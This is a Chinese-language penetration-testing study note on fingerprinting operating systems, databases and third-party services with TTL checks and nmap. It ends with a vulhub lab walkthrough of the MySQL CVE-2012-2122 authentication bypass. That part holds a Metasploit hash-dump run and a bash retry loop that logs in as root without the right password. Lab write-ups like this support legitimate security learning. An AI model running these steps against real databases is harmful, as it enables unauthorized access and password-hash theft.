admin 管理员组文章数量: 887006
系统及数据库等安全问题
操作系统层面
识别操作系统常见方法
-
Windows 对 大小写不敏感
https://www.bilibili/video/BV1JZ4y1c7ro?p=5
https://www.bilibili/video/BV1JZ4y1c7ro?P=5
都可以正常访问
linux:https://ctf.bugku/challenges/detail/id/81.html
https://ctf.bugku/challenges/detail/iD/81.html 不存在
-
通过TTL来判断目的主机的操作系统类型
不同的操作系统的默认TTL值是不同的, 所以我们可以通过TTL值来判断主机的操作系统,但是当用户修改了TTL值的时候,就会误导我们的判断,所以这种判断方式也不一定准确。下面是默认操作系统的TTL:
1、WINDOWS NT/2000 TTL:128
3、UNIX TTL:255
4、LINUX TTL:64
5、WIN7 TTL:128在命令窗口中使用ping命令:1.12.250.218是我的 CentOS 系统
即可大概确定是Linux系统
-
使用Nmap
C:\Users\15283>nmap -O 1.12.250.218 Starting Nmap 7.92 ( https://nmap ) at 2022-03-22 18:37 中国标准时间 Nmap scan report for 1.12.250.218 Host is up (0.026s latency). Not shown: 991 filtered tcp ports (no-response), 3 filtered tcp ports (admin-prohibited) PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp closed ftp 22/tcp open ssh 80/tcp open http 888/tcp open accessbuilder 8888/tcp open sun-answerbook Aggressive OS guesses: Linux 5.1 (92%), Linux 3.10 - 4.11 (91%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 3.18 (89%), Linux 3.16 - 4.6 (89%), Linux 4.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%) No exact OS matches for host (test conditions non-ideal). OS detection performed. Please report any incorrect results at https://nmap/submit/ . Nmap done: 1 IP address (1 host up) scanned in 48.22 seconds
可以看到是Linux
操作系统层面漏洞类型对应意义
windows安全漏洞:
https://docs.microsoft/en-us/security-updates/securitybulletins/2017/securitybulletins2017
例如:MS17010(永恒之蓝)漏洞就是Windows远程代码执行漏洞,可以获得远程电脑上的一定权限
简要操作系统层面漏洞影响范围
会得到操作系统权限的漏洞就是高危漏洞
数据库层面
识别数据库类型常见方法
-
常见的搭组合:
ASP+Access php + MySQL aspx+ MS sql jsp+MySQL, oracle python+mongo dB
-
使用Nmap扫描查看端口开放情况
关系型数据库 mysql 3306 sqlserver 1433 oracle 1521 psotgresql 5432 非关系型数据库 MongoDB 27017 Redis 6379 memcached 11211
3、 数据库常见漏洞类型及攻击
存在弱口令
数据库漏洞
- 简要数据库层面漏洞影响范围
数据库权限
网站权限
修改网页内容
第三方层面
如何判断有那些第三方平台或软件
通过网站去扫描有些网站安装了第三方的软件如phpmyadmin通过扫描就可以发现他的安装目录
判断安装了第三方软件
端口扫描
nmap -O -sV 10.1.1.130
Starting Nmap 7.91 ( https://nmap ) at 2021-06-08 09:26 CST
Nmap scan report for 10.1.1.130 (10.1.1.130)
Host is up (0.00085s latency).
Not shown: 978 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
可以得到第三方的平台
简要为什么要识别第三方平台或软件
不同的第三方软件或工具存在不同的漏洞、识别到更多的信息对收集到的漏洞也就越多
常见第三方平台或软件漏洞类型及攻击
弱口令
软件的漏洞攻击
简要第三方平台或软件安全测试的范围
直接获取到软件的权限便于进一步的提权和攻击
补充
除去常规WEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件,游戏,负载均衡等),也可以作为安全测试目标,此类目标测试原则只是少了WEB应用或其他安全问题。所以明确安全测试思路是很重要的!
实例
在靶机搭建vulhub
crabin@crabin-virtual-machine:~/vulhub/mysql/CVE-2012-2122$ docker-compose up -d
Creating network "cve-2012-2122_default" with the default driver
Pulling mysql (vulhub/mysql:5.5.23)...
5.5.23: Pulling from vulhub/mysql
22dc81ace0ea: Pull complete
1a8b3c87dba3: Pull complete
91390a1c435a: Pull complete
07844b14977e: Pull complete
b78396653dae: Pull complete
fe8cde33ebc9: Pull complete
eb305569f43b: Pull complete
Digest: sha256:5bbb7570f16526da1de61e84487daade5614eb2a9bfd28a87bcf4d6795b94463
Status: Downloaded newer image for vulhub/mysql:5.5.23
Creating cve-2012-2122_mysql_1 ... done
演示某数据库弱口令及漏洞演示
参考文档:https://vulhub/#/environments/mysql/CVE-2012-2122/
┌──(root💀kali)-[~]
└─# nmap -O -sV 10.1.1.133
Starting Nmap 7.91 ( https://nmap ) at 2021-06-08 11:09 CST
Nmap scan report for 10.1.1.133 (10.1.1.133)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
3306/tcp open mysql MySQL 5.5.23
MAC Address: 00:0C:29:13:E9:61 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
漏洞利用
msf6 auxiliary(scanner/mysql/mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhosts 10.1.1.133
rhosts => 10.1.1.133
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set threads 10
threads => 10 #线程数
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 10.1.1.133:3306 - 10.1.1.133:3306 The server allows logins, proceeding with bypass test
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 10% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 20% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 30% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 40% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 50% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 60% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 70% complete
[*] 10.1.1.133:3306 - 10.1.1.133:3306 Authentication bypass is 80% complete
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Successfully bypassed authentication after 847 attempts. URI: mysql://root:DBrmCST@10.1.1.133:3306
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 10.1.1.133:3306 - 10.1.1.133:3306 Hash Table has been saved: /root/.msf4/loot/20210608111341_default_10.1.1.133_mysql.hashes_091970.txt
[*] 10.1.1.133:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
md5在线解密
https://www.cmd5/
└─# mysql -uroot -p123456 -h10.1.1.133
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 886
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| test |
+--------------------+
4 rows in set (0.001 sec)
方法二
┌──(root💀kali)-[~]
└─# for i in `seq 1 1000`;do mysql -uroot -pwrong -h 10.1.1.133 -P 3306; done 130 ⨯
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'10.1.1.128' (using password: YES)
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 1553
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
成功登入目标主机上的mysql数据库
版权声明:本文标题:【网络安全】系统及数据库等安全问题 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1733863350h1635037.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论